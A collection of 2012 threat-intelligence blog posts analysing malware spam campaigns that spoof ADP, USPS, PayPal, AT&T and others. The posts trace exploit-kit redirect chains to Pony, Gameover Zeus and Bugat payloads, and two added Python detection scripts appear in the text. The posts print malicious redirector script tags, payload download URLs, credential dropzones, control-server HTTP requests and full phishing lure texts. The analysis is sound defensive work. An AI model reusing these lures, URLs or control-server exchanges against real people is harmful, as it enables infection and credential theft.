Author Archives: spamalysis

ADP Funding Notification – Debit Draft

We've been quiet recently, but we haven't stopped our work. Behind the scenes we've been developing some new tools and techniques that we hope will enable us to more efficiently track the bad guys. We used some of these new tools and techniques in our analysis of a new spam run today that spoofed communications from ADP. We observed spam messages with the subject line “ADP Funding Notification – Debit Draft”. The spam sample we analyzed was sent from 78.96.173.243 – a known Cutwail spambot.

The link in this message directed victims to junnioreadriano.com.br/MZ0PnMj5/index.html. Note that our bad guys are still using the same /8-random-character/index.html pattern. This page contained the following two malicious javascript redirectors:

http://ftp.leocardz.com/BhSFTbq9/js.js
http://www.webondemand.altervista.org/V4uags9T/js.js

These javascript redirectors sent victims to a Blackhole Exploit kit at 50.116.38.183. This Blackhole exploit kit was hosting at least 9 different malicious payloads. Detected malware payloads identified by MD5 hash included the following:


All of these binaries appear, upon initial inspection, to be Pony downloaders.


Contact to the nearest post office

On 2012-04-26 we observed a round of USPS-flavored spam. We analyzed a spam message with the subject line “Contact to the nearest post office “. The full message was as follows:

Notification, 

We couldn’t deliver your parcel at your address. 

Reason deny: Postal code contains an error. 
LOCATION OF YOUR PARCEL:Des Moines 
STATUS OF YOUR ITEM: sort order 
SERVICE: Expedited Shipping 
Parcel number:U171553881 NU 
FEATURES: Yes 

The label of your parcel is enclosed to the letter. 
You should print the label and show it in the nearest post office to 
get a parcel. 

Important information! 
If the parcel isn’t received within 30 working days our company will 
have the right to claim compensation from you for it’s keeping in the 
amount of $12.28 for each day of keeping of it. 

You can find the information about the procedure and conditions of 
parcels keeping in the nearest office. 

Thank you for attention. 
USPS Express Services. 

Attached to this spam was the following zip archive:

File: Label_Parcel_USPS.NR_213-7004.zip
Size: 24725
MD5: 21464652804DE3916D755C75286AD5C4

This zip archive contained the following malicious downloader:

File: Label_Parcel.exe
Size: 26112
MD5: B37B8B306E9D2C1EEED0FB71C32E1657

This downloader was installed on the victim filesystem in the following location: C:\Documents and Settings\Administrator\Local Settings\Application Data\urlmon.exe.

This downloader sent the following GET request to a control server at everkosmo2012.ru:

GET /ab/index.php?r=gate&id=d0ef7554&group=24.04.2012_a&debug=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: everkosmo2012.ru

The control server returned the following response:

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Thu, 26 Apr 2012 12:52:08 GMT
Content-Type: text/html
Content-Length: 44
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze8
Vary: Accept-Encoding

run=http://www.baracademie.ca/_notes/ddd.exe

The downloader parsed the run= command and then downloaded the following executable from http://www.baracademie.ca/_notes/ddd.exe:

File: ddd.exe
Size: 579586
MD5: C64A7822CBF2EBA42D911B4F9E7C5D78

This executable is the same type of Office document stealer previously discussed in our American Airlines Ticket Attachment post. This Office document stealer variant POSTs stolen documents to everkosmo2012.ru over port 8000.

The initial downloader then sent a second GET request to the control server at everkosmo2012.ru. The control server responded, instructing the downloader to grab a secondary malware executable from http://www.baracademie.ca/_notes/mmm.exe. This executable was an Asprox spambot. It had the following properties:

File: mmm.exe
Size: 237056
MD5: 650912C5F2763F55196616B76D880CAD

This Asprox spambot retrieved its configuration file via the following POST request to a control server at illinoisnot.ru:

POST /wet.php HTTP/1.1
Host: illinoisnot.ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746

The configuration file included a spam template to be used in spamming operations. The downloaded spam template was as follows:

Message-ID: <%%MSGID%%>
From: %%FROM%%
To: <%%RCPT%%>
Subject: %%SUBJ%%
Date: %%DATE%%
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="%%BND:1%%"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

The configuration file instructed the Asprox bot to spam additional USPS-themed messages.

We noted that the domain illinoisnot.ru resolved to 81.17.24.72. This IP previously hosted other suspect domains including:


We know that at least the bristol1883314.ru domain hosted a Smoke Loader control server.

Confirm your US airways online reservation

On 2011-04-09 we observed an interesting round of US Airways spam. The sample we analyzed had a subject line of “Confirm your US airways online reservation”.

While this same template had been previously used in high-profile Gameover Zeus laden spam campaigns, this particular campaign was a bit different. The sample we analyzed had a link to a malicious page at go2gamers.com/us.html. Other spam samples from the same campaign had links to hacked websites with malicious us.html pages.

The malicious us.html page contained javascript that redirected victims to a Blackhole Exploit Kit at bamboozlefitclub.net/main.php?page=745b81e2608709b2. The bamboozlefitclub.net domain resolved to 85.189.11.134.

This Blackhole kit dropped a Bugat* payload with the following properties:

File: about.exe
Size: 71680
MD5: D1455B0C28A145C5D207F276F945ABCA

Unlike other Bugat payloads that we've documented here, which used a domain generation algorithm to determine their command and control server, this variant was hardcoded to connect to 4 domains for command and control instructions. This variant was configured to connect to the following:

scanforsecurytyholes.ru
testnosecurity.ru
securytycheckme.ru
krjjfgzzzooooem.ru

The scanforsecurytyholes.ru and securytycheckme.ru domains are currently offline. The other domains resolved to 91.201.4.142. After this variant successfully connected to the first available command and control server, in this case testnosecurity.ru/mev/in, it downloaded a configuration file that included a target list of over 400 websites. The vast majority of these targets were financial institutions. If you'd like a copy of the target list hit us up at spamalysis@gmail.com.

The downloaded configuration file also revealed the location of the domains hosting web injects. Bugat, and other banking malware, use web injects to dynamically man-in-the-middle a victim's online banking session. Basically, when a victim logs into their bank’s website these web injects take control of the session and steal the victim’s banking information in real time. The webinjects used by this Bugat variant were pulled from http://lavonoplanet.ru/mev/in/cp.php. The domain lavonoplanet.ru resolved to 91.201.4.142.

In addition to providing a configuration file, the command and control server at testnosecurity.ru also pushed a Bugat update on its victims. This updated Bugat payload had the following properties:

Size: 75271
MD5: 0386F4D83DD84D2F60352E00D3F504A6

This updated variant was configured to connect to the following command and control servers:

securytycheckme.ru
sexnotincity.ru

The domain securytycheckme.ru was offline, but the domain sexnotincity.ru resolved to 91.201.4.143. It seems like these guys like to host their domains in the same neighborhood. Mental note … stay out of this /24.

The updated Bugat variant pulled its webinjects from the following domains:

http://gloogle.in/mev/in/cp.php
https://meredianstatserv.com/aqweb/in.php

We apologize for not reporting on this one sooner but unfortunately our real lives got in the way this week.

* note, what we call Bugat others call Feodo or Cridex.

Re: Fwd: Wire Transfer Confirmation (FED REFERENCE 2862ZO31)

On 2012-04-11 we observed a NACHA-themed spam email with the subject line “Re: Fwd: Wire Transfer Confirmation (FED REFERENCE 2862ZO31)”. The spam sample we analyzed was sent from 186.46.122.162. This IP is a Cutwail spambot node.

This spam sample contained a malicious link to http://www.arydan.pl/page-15.htm. It appears that www.arydan.pl is an otherwise legitimate site that was hacked. The spammers placed page-15.htm in the webroot directory of this compromised site. We were able to locate other hacked sites that also contained a malicious page-15.htm. Other hacked sites included:

http://www.brochurepedia.nl/page-15.htm
http://www.mocvi.ge/page-15.htm
panda-roux.fr/page-15.htm

While there were likely many other hacked sites, the page-15.htm file appears to be a good indicator for this particular campaign. Unfortunately, this indicator is likely to be short lived and the spammers will almost certainly alter this pattern in future attacks.

The malicious page-15.htm files contained malicious javascript that redirected victims to a Phoenix Exploit kit at webmastaumuren.ru:8080/img/?promo=nacha. It is worth noting that this Phoenix Kit at webmastaumuren.ru imports content from the legitimate nacha.org website in an effort to construct a well-designed phishing website. We previously saw this same technique in an earlier NACHA-themed campaign on 2012-02-28.

This exploit kit in turn handed victims off to another exploit kit at dedovshinaus.su:8080/pages/dq.php?i=8. The kit at dedovshinaus.su dropped the following Gameover Zeus variant on its victims:

Size: 301096
MD5: C23C96D34C2D408E20C24F07DFE8E078

Victims that clicked on the report-ACH285369733632711US.exe link in the NACHA phishing site also downloaded the same Gameover Zeus variant (i.e. the same MD5 hash). This payload was digitally signed with a certificate labeled ‘t9H2RXj1BlhxLEQ’.

This Gameover variant had a botid of mf222a11. The operators of this campaign controlled victims via a proxy server at 200.58.99.114 over port 443. This is the same proxy server used in the BillMeLater spam campaign seen earlier today.

Important Information About Your Account

The spammers sure are busy. Today, 2012-04-11, we observed a new spam template spoofing communications from BillMeLater.com – a PayPal service. The spam sample we analyzed had a subject line of “Important Information About Your Account”.

The observed sample contained a malicious link to pe04.com.br/gMsyk6kT/index.html. This page contained the following javascript redirector:

<script type="text/javascript" src="http://axislegal.com.au/gcq37VtM/js.js"></script>

The above javascript redirected victims to a Blackhole Exploit Kit at http://209.59.219.231/showthread.php?t=d7ad916d1c0396ff.

This kit dropped a number of different exploits including the latest and greatest Java Exploit CVE-2012-0507. This malicious .jar file had the following properties:

File: Klot.jar
Size: 15719
MD5: 26720F0252EB91BB7A326375313651F9

The kit also dropped a Gameover Zeus variant with the following properties:

Size: 301096
MD5: 5CE366E6D7A949552AF10C4DEAF47506

The Gameover variant had a botid of NRa11. The criminals responsible for this campaign utilized a proxy at 200.58.99.114 to control victims infected with this Gameover variant.

Your Flightticket

On Monday April 9, 2012, we examined a spam email with the subject line “Your Flightticket”. This spam message contained the following text:

Dear Customer,

FLIGHT NUMBER 3702-5114295

DATE/TIME : APRIL 16, 2011, 17:16 PM
ARRIVING AIRPORT: NEW-YORK AIRPORT
PRICE : 3872.58 USD

Your bought ticket is attached to the letter as a scan document (Internet Exlporer File).

To use your ticket you should print it.

Nelda Sharpe,

The attached zip file had an MD5 of b9502c28044ad8335beca132c3c81b12. The zip file contained an html file. This html file contained malicious javascript that redirected victims to a Phoenix Exploit kit at 112.78.124.115:8080/navigator/jueoaritjuir.php. Victims were then redirected to a second Phoenix Exploit kit at engineofsovjets.su:8080/navigator/frf3.php?i=8.

The Phoenix kit at engineofsovjets.su dropped a Pony downloader with the following properties:

File: dsarcubqinhsjqkugsbm.exe
Size: 147496
MD5: E6F5310AC836E48C3B4181E1C00CE4CD

This Pony downloader was signed with a digital certificate labeled “4mb5gWTlIemu0h0”.

This Pony downloader was configured to send stolen FTP and other web admin credentials to dropzones at:

http://www.alberghi.com:8080/pony/gate.php
http://buyandsmile.atomclick.co:8080/pony/gate.php

This Pony downloader was also configured to download a Gameover Zeus payload from the following locations:

http://contabilidadesr.com.br/1mmF86V8/Vdqu.exe
http://www.vandenboschelektro.be/vgwCwvDs/Y9fNYJCs.exe
http://geovanabauerdocesfinos.com.br/6md3zev5/hQj.exe

This Gameover Zeus variant had the following properties:

Size: 305704
MD5: 01D994DF6DBDA4F49E8A6D9CB0005485

This Gameover variant had a botid of mf222a10. Oh yeah, it was also signed with the same digital cert – “4mb5gWTlIemu0h0”.

Where have we seen that digital cert before? Oh yeah, the Newegg.com-themed campaign from April 9, 2012 also signed its Pony and Zeus payloads with the same digital certificate.

This fact is significant because the Newegg campaign leveraged a Blackhole Exploit Kit infrastructure whereas the Flightticket-themed campaign leveraged a Phoenix Exploit kit infrastructure. While these campaigns leverage different exploit kit infrastructures it seems clear that they are related, as they are dropping the same malware families and are signing payloads with the same digital certificates.

Newegg.com – Payment Charged

On 2012-04-09 we observed a Newegg.com-themed spam template. The spam message that we observed had a subject line of “Newegg.com – Payment Charged” and was sent from a Cutwail spambot.

The observed spam contained a malicious link to http://game.knightscricket.co.za/SpwNjjYt/index.html. There were likely other Newegg.com-themed spam messages associated with this campaign that contained different malicious links and had different subject lines.

The above malicious page, http://game.knightscricket.co.za/SpwNjjYt/index.html, contained the following javascript redirectors:

<script type="text/javascript" src="http://congress-assistants.fi/idm2TZP1/js.js"></script>
<script type="text/javascript" src="http://primasaleorganik.com/3N6zKxSS/js.js"></script>

These javascript redirectors bounced victims to an exploit kit at http://216.224.182.94/showthread.php?t=d7ad916d1c0396ff.

This exploit kit dropped a Pony downloader with the following properties:

Size: 147496
MD5: DFDA409D8BCC7CDDBBB39A40E388E8BA

This Pony downloader was signed with a digital certificate labeled “4mb5gWTlIemu0h0”.

This Pony downloader was configured to send stolen FTP and other web admin credentials to dropzones at:

http://www.alberghi.com:8080/pony/gate.php
http://buyandsmile.atomclick.co:8080/pony/gate.php

Hrm, notice that the domain alberghi.com, home to a Pony drop in this campaign, was also home to a Blackhole Exploit kit in a previous American Express-themed spam campaign.

The above Pony downloader, DFDA409D8BCC7CDDBBB39A40E388E8BA, was also configured to download a Gameover Zeus payload from the following locations:

http://finskiydom.com.ua/JdS.exe
http://developerspk.com/DeYhzGj.exe
http://mestraimoveis.com.br/0Ev34x.exe
http://www.bmsevero.com.br/J1eGwcP.exe

This Zeus payload had the following properties:

Size: 305704
MD5: D76F25DF18F89830323CD6DECD657574

Interesting … this Zeus payload was signed with the same digital cert as the above Pony downloader. The Zeus payload’s digital cert had the same “4mb5gWTlIemu0h0” label.

This Zeus variant had a botid of “NRa10”.

Your AT&T wireless bill is ready to view

On 2012-04-03 we observed another new spam template circulating in the wild. This spam template spoofed communications from AT&T Wireless. I guess the Verizon Wireless spam campaigns we've seen in the last few weeks were a success and the spammers behind these attacks decided to try out a new brand. The AT&T Wireless spam template that we analyzed had a subject line of “Your AT&T wireless bill is ready to view”.

The spam message that we analyzed was loaded with malicious links. These links were as follows:

Each spam message associated with this campaign likely contains a different assortment of malicious links. The common characteristic of all these malicious links is that they all contain a random set of 8 alpha-numeric characters in the URI path. This identifier has remained consistent across all the different spam templates associated with this particular campaign.

The malicious pages above hosted the following javascript redirectors:

Note that these javascript redirectors also contained the same pattern of 8 alpha-numeric characters in the URI path.
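The URI pattern described above (eight random alphanumeric characters before index.html or js.js), the showthread.php Blackhole landing and the /pony/gate.php dropzone path recur throughout these posts. As an added example that is not part of the original post, this Python script matches those patterns against constructed proxy-log lines; the function names and the log line format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path patterns lifted from the campaign URLs in these posts. Note that the
# 8-character rule also matches any benign 8-letter directory name (e.g.
# /products/index.html), so treat it as a lead, not a verdict.
PATH_INDICATORS = [
    # hacked-site landing page: /<8 alphanumerics>/index.html
    ("landing_8char", re.compile(r"^/[A-Za-z0-9]{8}/index\.html$")),
    # second-stage redirector script: /<8 alphanumerics>/js.js
    ("redirector_8char", re.compile(r"^/[A-Za-z0-9]{8}/js\.js$")),
    # Pony credential dropzone
    ("pony_gate", re.compile(r"/pony/gate\.php$")),
    # NACHA campaign page planted in compromised webroots
    ("page15_redirect", re.compile(r"^/page-15\.htm$")),
]
# Blackhole landing: showthread.php?t=<16 hex>; the t= value was constant
# (d7ad916d1c0396ff) across the kits seen here. Real forum URLs usually carry
# a short decimal thread id, which this regex rejects.
BLACKHOLE_T = re.compile(r"^[0-9a-f]{16}$")


def classify_url(url: str):
    """Return the name of the indicator a URL matches, or None."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    for name, rx in PATH_INDICATORS:
        if rx.search(parts.path):
            return name
    if parts.path == "/showthread.php":
        t = parse_qs(parts.query).get("t", [""])[0]
        if BLACKHOLE_T.match(t):
            return "blackhole_showthread"
    return None


def scan_proxy_log(lines):
    """Return (client_ip, url, indicator) for every line hitting an indicator.
    Assumed (constructed) line format: '<timestamp> <client_ip> <url>'."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        client, url = fields[1], fields[2]
        indicator = classify_url(url)
        if indicator:
            hits.append((client, url, indicator))
    return hits


# Constructed sample log: one client walking the full chain, one benign client.
SAMPLE_LOG = """\
1333400000.100 10.0.0.5 http://pe04.com.br/gMsyk6kT/index.html
1333400000.300 10.0.0.5 http://axislegal.com.au/gcq37VtM/js.js
1333400000.900 10.0.0.5 http://209.59.219.231/showthread.php?t=d7ad916d1c0396ff
1333400005.000 10.0.0.5 http://50.56.223.113:8080/pony/gate.php
1333400010.000 10.0.0.7 http://example.com/shop/index.html
1333400011.000 10.0.0.7 http://example.com/forum/showthread.php?t=12345
""".splitlines()

if __name__ == "__main__":
    for client, url, indicator in scan_proxy_log(SAMPLE_LOG):
        print(f"{client} {indicator:22} {url}")
```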

These javascripts redirected victims to a Blackhole Exploit kit at http://174.140.171.100/showthread.php?t=d7ad916d1c0396ff.

As with the previous Blackhole Exploit kits we've documented on this blog, this exploit kit targets an assortment of PDF, Flash, MSFT, and Java vulnerabilities. The most effective exploit code hosted at this and other Blackhole kits used in this ongoing campaign appears to be the Java Atomic Exploit, which targets CVE-2012-0507. This exploit was hosted on the Blackhole Exploit kit at 174.140.171.100 as a .jar file with the following properties:

File: Pol.jar
Size: 14314
MD5: 8050B15A9D6A530BBADC564813BCB2EB

This .jar file was only detected by 2 of 41 AV Vendors on Virustotal.

The Blackhole Exploit Kit at http://174.140.171.100/showthread.php?t=d7ad916d1c0396ff dropped the following Pony downloader on vulnerable victims:

File: contacts.exe
Size: 95272
MD5: FFDC8980585A48DF7B63388A1B3C3642

This Pony variant was configured to send stolen FTP and other web admin credentials to dropzones at:

We know that 91.121.178.156 was previously home to a Blackhole Exploit Kit. We know because urlQuery.net told us. While the domain subdatapro.com is not currently on our radar, we would not be surprised if it served a Blackhole Exploit Kit in the not too distant future.

The Pony variant (FFDC8980585A48DF7B63388A1B3C3642) was also configured to download a Gameover Zeus variant from the following locations:

This Gameover Zeus variant had the following properties:

Size: 296488
MD5: 54A3D8C0F15E16655CAF35306EFC87E5

This variant had a botid of NRa3. The criminals behind this campaign utilized a proxy at 77.43.1.67:443 to control victims infected with this Gameover variant.

Check from Christian Liberty Financial

On 2012-04-02 we observed a spam email via Cisco’s Security Intelligence Operations with the subject line “Check from Christian Liberty Financial, Mon, 2 Apr 2012 12:33:29 +0100”.

This spam message contained the following body:

Advance Notice
|
Enter this code:
SODK2YP7-EO7O-BIVU-8395-4NVDN6VX6O1S
Pay-day Application Enclosed – Please Review
Money Today
Today Only!
1023
Payble to:
*******
amount:
5000.00
—————— AXLB1KQE-IFB0-KP39-C84Y-QRFSYWDQLW61 ——————————————-
Dollars
Money for:
Bills, Shopping, Vacation, Rent, Anything
***** For Immediate Processing Refer to Attached Instructions*****
CAN-SPAM Compliant
E.M.G.
341 Raven Circle
Wyoming, DE 19934

This spam message had a .zip file attached with the filename Your_Check_Details-8857777_042012.zip. This .zip file contained a malicious executable with the following properties:

File: Your_Check_Details_042012.exe
Size: 149504
MD5: A6D4F87E65359ACBB1640611D36E4685

This malicious executable is an ICE IX Zeus variant. This ICE IX Zeus variant communicates with a command and control server at bluesbars.ru via the following POST request:

POST /lampard.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)
Host: bluesbars.ru
Content-Length: 77
Cache-Control: no-cache

The command and control server was configured to return an encrypted configuration file with the filename “setusating.bin”. During testing the server did not return this file.

It is worthwhile to note that the control server at bluesbars.ru was hosted on a fast flux infrastructure. Via centralops.net we see that bluesbars.ru had an A record with a TTL of 300 seconds and currently resolved to both 217.24.246.7 and 60.19.30.135. This particular fast flux infrastructure is the same infrastructure that was used in the previous spam campaign documented in our post “Triple Barrel Spam Cannon”.
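As an added example that is not part of the original post, the following Python heuristic flags a hostname as fast-flux-like when repeated lookups show a low TTL and A records spread across more than one network, as bluesbars.ru did. The lookup observations are constructed (the IPs and TTL are those reported above; the other hosts are made up), and the thresholds and function names are assumptions.

```python
import ipaddress
from collections import defaultdict

# Assumed thresholds: the post saw a 300 s TTL, and the two A records sat in
# unrelated networks. A CDN also answers with short TTLs, so IP diversity
# across networks is what separates the two cases here.
FAST_FLUX_MAX_TTL = 300
FAST_FLUX_MIN_NETWORKS = 2
NETWORK_PREFIX = 16


def distinct_networks(ips, prefix=NETWORK_PREFIX):
    """Collapse addresses to their /prefix networks."""
    return {ipaddress.ip_network(f"{ip}/{prefix}", strict=False) for ip in ips}


def assess(observations):
    """observations: iterable of (hostname, ttl_seconds, [ip, ...]), one per lookup.
    Returns {hostname: {"ttl": min_ttl, "ips": set, "networks": n, "fast_flux": bool}}."""
    by_host = defaultdict(lambda: {"ttl": None, "ips": set()})
    for host, ttl, ips in observations:
        rec = by_host[host]
        rec["ttl"] = ttl if rec["ttl"] is None else min(rec["ttl"], ttl)
        rec["ips"].update(ips)
    result = {}
    for host, rec in by_host.items():
        nets = distinct_networks(rec["ips"])
        result[host] = {
            "ttl": rec["ttl"],
            "ips": rec["ips"],
            "networks": len(nets),
            "fast_flux": rec["ttl"] <= FAST_FLUX_MAX_TTL
            and len(nets) >= FAST_FLUX_MIN_NETWORKS,
        }
    return result


# Constructed lookups: bluesbars.ru as reported above, plus two benign hosts.
OBSERVATIONS = [
    ("bluesbars.ru", 300, ["217.24.246.7", "60.19.30.135"]),
    ("bluesbars.ru", 300, ["60.19.30.135", "217.24.246.7"]),
    ("cdn.example.net", 60, ["203.0.113.10", "203.0.113.11"]),  # low TTL, one network
    ("static.example.org", 86400, ["198.51.100.5"]),          # long TTL, one address
]

if __name__ == "__main__":
    for host, info in assess(OBSERVATIONS).items():
        flag = "FAST-FLUX?" if info["fast_flux"] else "ok"
        print(f"{host:20} ttl={info['ttl']:<6} nets={info['networks']} {flag}")
```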

You sent a payment

The spam hits kept a rollin’ today. On 2012-04-02 we observed a PayPal-themed spam campaign.

The spam sample that we analyzed had a subject line of “You sent a payment.” This sample contained the following malicious links:

The malicious pages contained the following javascript redirectors:

<script type="text/javascript" src="http://hirochan.boo.jp/7PMiDL3p/js.js"></script>
<script type="text/javascript" src="http://renovation-nantes.com/NCAsBwpU/js.js"></script>
<script type="text/javascript" src="http://ncworld.in/bgGdzvBh/js.js"></script>

The javascripts redirected victims to a Blackhole Exploit Kit at http://50.56.223.113:8080/showthread.php?t=d7ad916d1c0396ff.

Note that we previously saw the IP 50.56.223.113 used as a dropzone for the Pony downloader variant used in the attack documented in our post US Airways online check-in. This is a pattern we've observed in the past, where IPs were used both to host Blackhole Exploit kits and Pony downloader drop zones.

The Blackhole kit at 50.56.223.113 dropped a Pony downloader variant with the following properties:

File: info.exe
Size: 94761
MD5: C150FCEA73F3B2904BBEBE0E601B53AC

This Pony downloader variant was configured to send stolen FTP and web admin credentials to the following dropzones:

http://50.56.223.113:8080/pony/gate.php
http://91.121.178.156:8080/pony/gate.php

The Pony variant also downloaded a Gameover Zeus variant from the following locations:

http://haine-fashion.ro/bLXJU5o.exe
http://hermanosbrando.es/8xsfW5.exe
http://confeitariadossonhos.com.br/Wo4RUjB.exe

The Gameover variant had the following properties:

Size: 297512
MD5: 1E3AA9BCFB6300F426030532821525EA

This variant had a botid of “NRa3”. Note that the day counter in the botid had been incremented to 3. This is significant because we analyzed this sample at approximately 8pm EDT on 2012-04-02. That the botid had been incremented to 3 suggests that the bot was compiled in and distributed from a different timezone … perhaps somewhere in Europe?